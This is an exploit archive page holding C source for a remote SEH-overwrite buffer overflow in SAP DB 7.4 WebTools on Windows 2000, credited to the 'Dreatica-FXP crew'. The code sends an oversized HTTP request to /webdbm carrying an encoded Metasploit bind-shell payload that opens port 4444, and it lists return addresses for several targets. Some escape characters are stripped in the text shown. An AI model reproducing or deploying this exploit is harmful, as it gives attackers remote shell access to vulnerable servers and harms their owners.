Home / exploits sapdb-seh.txt
Posted on 10 July 2007
/* Dreatica-FXP crew * * ---------------------------------------- * Target : SAP DB 7.4 WebTools * Site : http://www.sapdb.org * Found by : NGSSoftware Insight Security Research * ---------------------------------------- * Exploit : SAP DB 7.4 WebTools Remote SEH overwrite exploit * Exploit date : 07.07.2007 * Exploit writer : Heretic2 (heretic2x@gmail.com) * OS : Windows 2000 ALL SP * Crew : Dreatica-FXP * ---------------------------------------- * Info : This is the SEH overwrite realization of the vulnerability found by * NGSSoftware Insight Security Research, it is trivial. We send a big amount * of bytes to server (about 20000) and overwrite SEH. Aproximatly at the 9900 * byte we trigger an exception and our shellcode is executed. * ---------------------------------------- * Compiling : * To compile this exploit you need: * 1. Windows C/C++ compiler * 2. WinSock 2 * ---------------------------------------- * Thanks to : * 1. NGSSoftware Insight Security Research ( http://www.ngssoftware.com/ ) * 2. The Metasploit project ( http://metasploit.com ) * 3. Dreatica-FXP crew ( http://www.dreatica.cl ) * ---------------------------------------- * This exploit was written for educational purpose only. Use it at your own risk. Author will be not be * responsible for any damage, caused by that code. ************************************************************************************ */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock2.h> #include <ctime> #pragma comment(lib,"ws2_32") void usage(char * s); void logo(); void end_logo(); void prepare_shellcode(unsigned char * fsh, int sh); void make_buffer(unsigned char * buf, int itarget, int sh); int send_buffer(unsigned char * buf, char * remotehost, int port); SOCKET do_connect (char *remotehost, int port); int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded ); static long timeout = 2000 ; // 2 sec // ----------------------------------------------------------------- // XGetopt.cpp Version 1.2 // ----------------------------------------------------------------- int getopt(int argc, char *argv[], char *optstring); char *optarg; // global argument pointer int optind = 0, opterr; // global argv index // ----------------------------------------------------------------- // ----------------------------------------------------------------- struct _target{ const char *t ; unsigned long ret ; } targets[]= { {"UNIVERSAL: SAP DB 7.4.3 [WAPI.dll]", 0x1003a218 },// call ebx {"Windows 2000 Pro SP4 RUSSIAN [kernel32.dll]", 0x793a4a66 },// jmp ebx {"Windows 2000 Pro SP4 ENGLISH [kernel32.dll]", 0x7c4e4a66 },// jmp ebx {"Debug / DoS", 0x42424242 }, {NULL, 0x00000000 } }; struct { const char * name; int length; char * shellcode; }shellcodes[]={ {"Bindshell, port 4444 [ args: none ]", 696, /* win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ "xebx03x59xebx05xe8xf8xffxffxffx49x49x37x49x49x49" "x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax42" "x58x50x30x42x31x41x42x6bx42x41x52x42x32x42x41x32" "x41x41x30x41x41x58x50x38x42x42x75x6ax49x4bx4cx62" "x4ax68x6bx30x4dx59x78x49x69x4bx4fx79x6fx69x6fx71" "x70x4ex6bx32x4cx51x34x64x64x6ex6bx41x55x77x4cx4c" "x4bx71x6cx35x55x64x38x54x41x58x6fx4cx4bx30x4fx47" "x68x4ex6bx53x6fx47x50x74x41x58x6bx70x49x4cx4bx35" "x64x6cx4bx36x61x68x6ex57x41x79x50x6fx69x4cx6cx6c" "x44x4bx70x63x44x43x37x5ax61x78x4ax44x4dx36x61x6a" "x62x38x6bx78x74x77x4bx51x44x74x64x76x48x51x65x4a" "x45x4ex6bx73x6fx61x34x55x51x5ax4bx71x76x6cx4bx64" "x4cx72x6bx4ex6bx63x6fx57x6cx75x51x7ax4bx33x33x34" "x6cx6cx4bx6ex69x72x4cx45x74x45x4cx30x61x4fx33x50" "x31x69x4bx61x74x6cx4bx57x33x66x50x4ex6bx43x70x64" "x4cx6ex6bx32x50x65x4cx6ex4dx6ex6bx77x30x67x78x31" "x4ex33x58x6cx4ex30x4ex34x4ex5ax4cx50x50x4bx4fx69" "x46x72x46x62x73x70x66x35x38x57x43x35x62x45x38x30" "x77x63x43x44x72x71x4fx71x44x79x6fx4ax70x73x58x78" "x4bx48x6dx4bx4cx77x4bx56x30x79x6fx7ax76x51x4fx6f" "x79x79x75x32x46x4bx31x48x6dx43x38x45x52x70x55x73" "x5ax33x32x6bx4fx4ax70x72x48x69x49x36x69x4cx35x6e" "x4dx50x57x4bx4fx6ax76x36x33x36x33x61x43x33x63x62" "x73x43x73x36x33x50x43x63x63x4bx4fx68x50x43x56x71" "x78x62x31x51x4cx30x66x30x53x6bx39x78x61x4cx55x65" "x38x4ex44x67x6ax74x30x6fx37x70x57x69x6fx6ex36x32" "x4ax36x70x43x61x32x75x79x6fx4ex30x50x68x4fx54x6e" "x4dx64x6ex6dx39x52x77x79x6fx58x56x66x33x36x35x69" "x6fx4ex30x45x38x38x65x72x69x6bx36x77x39x33x67x79" "x6fx6ex36x70x50x31x44x62x74x73x65x6bx4fx58x50x6d" "x43x50x68x4bx57x44x39x4fx36x64x39x71x47x6bx4fx49" "x46x63x65x6bx4fx4ax70x71x76x50x6ax50x64x50x66x70" "x68x50x63x52x4dx6ex69x58x65x32x4ax46x30x63x69x45" "x79x48x4cx4cx49x7ax47x63x5ax70x44x4dx59x78x62x36" "x51x39x50x38x73x4fx5ax6bx4ex41x52x64x6dx6bx4ex32" "x62x36x4cx4ex73x4cx4dx43x4ax34x78x4cx6bx6ex4bx6e" "x4bx51x78x70x72x6bx4ex4ex53x47x66x4bx4fx32x55x50" "x44x4bx4fx7ax76x43x6bx70x57x62x72x46x31x66x31x32" "x71x30x6ax35x51x33x61x32x71x33x65x53x61x4bx4fx5a" "x70x30x68x6ex4dx6ex39x73x35x7ax6ex62x73x4bx4fx48" "x56x63x5ax6bx4fx59x6fx57x47x39x6fx6ex30x4ex6bx30" "x57x59x6cx4bx33x38x44x45x34x59x6fx39x46x50x52x39" "x6fx58x50x65x38x38x70x6ex6ax37x74x53x6fx31x43x6b" "x4fx6ax76x6bx4fx78x50x42" }, {NULL , NULL } }; int main(int argc, char **argv) { char * remotehost=NULL; char default_remotehost[]="127.0.0.1"; char temp1[100], temp2[100]; int port, itarget, sh; SOCKET s; char c; int option_index=0; logo(); WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa); if(argc<2) { usage(argv[0]); return -1; } // set defaults port=9999; itarget=-1; sh=0; // ------------ while((c = getopt(argc, argv, "h:p:t:"))!= EOF) { switch (c) { case 'h': remotehost=optarg; break; case 't': sscanf(optarg, "%d", &itarget); itarget--; break; case 'p': sscanf(optarg, "%d", &port); break; default: usage(argv[0]); WSACleanup(); return -1; } } if(remotehost == NULL) remotehost=default_remotehost; memset(temp1,0,sizeof(temp1)); memset(temp2,0,sizeof(temp2)); memset(temp1, 'x20' , 58 - strlen(remotehost) -1); printf(" # Host : %s%s# ", remotehost, temp1); sprintf(temp2, "%d", port); memset(temp1,0,sizeof(temp1)); memset(temp1, 'x20' , 58 - strlen(temp2) -1); printf(" # Port : %s%s# ", temp2, temp1); memset(temp1,0,sizeof(temp1)); memset(temp2,0,sizeof(temp2)); sprintf(temp2, "%s", shellcodes[sh].name ); memset(temp1, 'x20' , 58 - strlen(temp2) -1); printf(" # Payload : %s%s# ", temp2, temp1); if(itarget!=-1) { memset(temp1,0,sizeof(temp1)); memset(temp1, 'x20' , 58 - strlen(targets[itarget].t) -1); printf(" # Target : %s%s# ", targets[itarget].t, temp1); }else { memset(temp1,0,sizeof(temp1)); memset(temp1, 'x20' , 58 - strlen("Please select target") -1); printf(" # Target : %s%s# ", "Please select target", temp1); } printf(" # ------------------------------------------------------------------- # "); fflush(stdout); printf(" [+] Checking if server is online "); fflush(stdout); s=do_connect(remotehost, port); if(s==-1) { printf(" [-] Server is OFFLINE "); end_logo(); return 0; } closesocket(s); printf(" [+] Server is ONLINE "); unsigned char buf[30000]; memset(buf,0,sizeof(buf)); fflush(stdout); make_buffer(buf, itarget, sh); printf(" [+] Attacking buffer constructed "); if(send_buffer(buf, remotehost,port)==-1) { printf(" [-] Cannot exploit server %s ", remotehost); end_logo(); WSACleanup(); return -1; } printf(" [+] Buffer sent "); printf(" [+] Connect to %s:%d ", remotehost, 4444); end_logo(); WSACleanup(); return 0; } SOCKET do_connect (char *remotehost, int port) { static struct hostent *host; static struct sockaddr_in addr; SOCKET s; host = gethostbyname(remotehost); if (!host) { perror("[-] gethostbyname() failed"); return -1; } addr.sin_addr = *(struct in_addr*)host->h_addr; s = socket(PF_INET, SOCK_STREAM, 0); if (s == -1) { closesocket(s); perror("socket() failed"); return -1; } addr.sin_port = htons(port); addr.sin_family = AF_INET; if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1) { closesocket(s); return -1; } return s; } void prepare_shellcode(unsigned char * fsh, unsigned int * fshlength, int sh) { memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length); *fshlength = shellcodes[sh].length; } void make_buffer(unsigned char * buf, int itarget, int sh) { // prepare shellcode unsigned char fsh[10000]; unsigned int fshlength; memset(fsh, 0, sizeof(fsh)); prepare_shellcode(fsh, &fshlength, sh); // ----------------- // make buffer unsigned char * cp=buf; // HTTP request memcpy(cp, "GET /webdbm?Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=", strlen("GET /webdbm?Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=")); cp +=strlen((char *)cp); // long request memset(cp, 'A', 20774); cp +=strlen((char *)cp); // jmp over 6 bytes *cp++ = 'x90'; *cp++ = 'x90'; *cp++ = 'xEB'; *cp++ = 'x06'; // SEH handler *cp++ = (char)((targets[itarget].ret ) & 0xff); *cp++ = (char)((targets[itarget].ret >> 8) & 0xff); *cp++ = (char)((targets[itarget].ret >> 16) & 0xff); *cp++ = (char)((targets[itarget].ret >> 24) & 0xff); // jff *cp++ = 'x90'; *cp++ = 'x90'; *cp++ = 'x90'; *cp++ = 'x90'; // copy shellcode memcpy(cp, fsh, fshlength); cp+=fshlength; // end of HTTP request memcpy(cp, " HTTP/1.0 ", strlen(" HTTP/1.0 ")); cp +=strlen((char *)cp); // ----------------- } int send_buffer(unsigned char * buf, char * remotehost, int port) { SOCKET sock; int bytes; sock = do_connect(remotehost, port); if(sock==-1) printf(" [-] Failed to connect to server "); bytes = send(sock, (char *)buf, (int)strlen((char *)buf), 0); if (bytes<0) printf(" [-] Failed to send the buffer "); else printf(" [+] Sent %d bytes ", bytes); closesocket(sock); return 1; } // ----------------------------------------------------------------- // XGetopt.cpp Version 1.2 // ----------------------------------------------------------------- int getopt(int argc, char *argv[], char *optstring) { static char *next = NULL; if (optind == 0) next = NULL; optarg = NULL; if (next == NULL || *next == '�') { if (optind == 0) optind++; if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '�') { optarg = NULL; if (optind < argc) optarg = argv[optind]; return EOF; } if (strcmp(argv[optind], "--") == 0) { optind++; optarg = NULL; if (optind < argc) optarg = argv[optind]; return EOF; } next = argv[optind]; next++; // skip past - optind++; } char c = *next++; char *cp = strchr(optstring, c); if (cp == NULL || c == ':') return '?'; cp++; if (*cp == ':') { if (*next != '�') { optarg = next; next = NULL; } else if (optind < argc) { optarg = argv[optind]; optind++; } else { return '?'; } } return c; } // ----------------------------------------------------------------- // ----------------------------------------------------------------- // ----------------------------------------------------------------- void usage(char * s) { printf(" Usage : %s -h <host> -p <port> -t <target> ", s); printf(" Arguments: "); printf(" -h <host> host to connect "); printf(" -p <port> port (default: 9999) "); printf(" -t <target> target to attack "); printf(" Shellcodes: "); for(int i=0; shellcodes[i].name!=0;i++) { printf(" %d. %s ",i+1,shellcodes[i].name); } printf(" "); printf(" Targets: "); for(int j=0; targets[j].t!=0;j++) { printf(" %d. %s ",j+1,targets[j].t); } printf(" "); end_logo(); } void logo() { printf(" "); printf(" ####################################################################### "); printf(" # ____ __ _ ______ __ _____ # "); printf(" # / __ \________ _____/ /_(_)_________ / __/\ \/ / / _ / # "); printf(" # / / / / ___/ _ \/ __ / __/ / ___/ __ / ___ / / \ / / // / # "); printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \ / ___/ # "); printf(" # /_____/_/ \___/ \_,_/\__/_/\___/\__,_/ /_/ /_/\_\/_/ # "); printf(" # crew # "); printf(" ####################################################################### "); printf(" # Exploit : SAP DB 7.4 WebTools Remote SEH overwrite exploit # "); printf(" # Author : Heretic2 (heretic2x@gmail.com # "); printf(" # Research: NGSSoftware Insight Security Research # "); printf(" # Version : 1.0 Public Release # "); printf(" # System : Windows 2000 ALL SP # "); printf(" # Date : 07.07.2007 # "); printf(" # ------------------------------------------------------------------- # "); } void end_logo() { printf(" # ------------------------------------------------------------------- # "); printf(" # Dreatica-FXP crew [Heretic2] # "); printf(" ####################################################################### "); }
